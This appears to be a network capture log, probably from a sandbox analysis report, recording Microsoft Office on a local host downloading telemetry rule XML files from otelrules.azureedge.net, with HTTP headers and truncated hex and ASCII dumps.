2024-12-07 09:52:09 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:09 GMT Content-Type: text/xml Content-Length: 1391 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF58DC7E" x-ms-request-id: deed8991-301e-0033-2005-48fa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095209Z-r1cf579d778qlpkrhC1EWRpfc800000002mg0000000035ub x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:09 UTC	1391	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.6	49875	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:10 UTC	192	OUT	GET /rules/rule703351v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:11 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCDD6400" x-ms-request-id: 94f5badb-301e-0000-7603-48eecc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095211Z-r1cf579d77867vg8hC1EWR8knc00000001yg000000000pxy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:11 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.6	49876	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:11 UTC	192	OUT	GET /rules/rule703350v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:11 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT ETag: "0x8DC582BDF1E2608" x-ms-request-id: 5f90aa43-701e-0097-6403-48b8c1000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095211Z-r1cf579d7789trgthC1EWRkkfc00000002qg000000001xbp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:11 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	49877	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:11 UTC	192	OUT	GET /rules/rule703501v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:11 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT ETag: "0x8DC582BE8C605FF" x-ms-request-id: a762f06e-601e-0084-7004-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095211Z-r1cf579d778x776bhC1EWRdk8000000002200000000018zm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:11 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	49878	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:11 UTC	192	OUT	GET /rules/rule703500v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:11 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF497570" x-ms-request-id: 2d97fd60-e01e-000c-7b06-488e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095211Z-r1cf579d778d5zkmhC1EWRk6h800000002fg000000001xmt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:11 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.6	49879	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:11 UTC	192	OUT	GET /rules/rule701801v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:11 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:11 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC2EEE03" x-ms-request-id: c22706de-601e-00ab-7503-4866f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095211Z-r1cf579d7784wpmvhC1EWRk4cn00000001kg000000000buh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:11 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	49880	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:12 UTC	192	OUT	GET /rules/rule701800v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:13 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BEA414B16" x-ms-request-id: 22947e51-b01e-0021-7203-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095213Z-r1cf579d7789trgthC1EWRkkfc00000002kg000000003vg4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:13 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.6	49882	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:13 UTC	192	OUT	GET /rules/rule701051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:13 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT ETag: "0x8DC582BE1CC18CD" x-ms-request-id: 1f576be4-501e-008f-5405-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095213Z-r1cf579d778kr8xrhC1EWRfkun00000002g0000000001pw9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:13 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.6	49881	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:13 UTC	192	OUT	GET /rules/rule701050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:13 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB256F43" x-ms-request-id: a681d1f9-301e-0020-1b07-486299000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095213Z-r1cf579d778w59f9hC1EWRze6w000000025g000000003bv5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:13 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.6	49883	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:13 UTC	192	OUT	GET /rules/rule702751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:13 GMT Content-Type: text/xml Content-Length: 1403 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB866CDB" x-ms-request-id: af038a62-701e-005c-6f03-48bb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095213Z-r1cf579d77867vg8hC1EWR8knc00000001u00000000032ry x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:13 UTC	1403	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.6	49884	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:13 UTC	192	OUT	GET /rules/rule702750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:13 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:13 GMT Content-Type: text/xml Content-Length: 1366 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE5B7B174" x-ms-request-id: 7b8d486f-101e-0017-1506-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095213Z-r1cf579d778qgtz2hC1EWRmgks00000001tg000000002tpd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:13 UTC	1366	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.6	49885	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:52:15 UTC	192	OUT	GET /rules/rule702301v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:52:15 UTC	494	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:52:15 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT ETag: "0x8DC582BE976026E" x-ms-request-id: 1c872757-c01e-0034-1307-482af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095215Z-r1cf579d778t5c2lhC1EWRce3w00000002t0000000000hg1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:52:15 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> 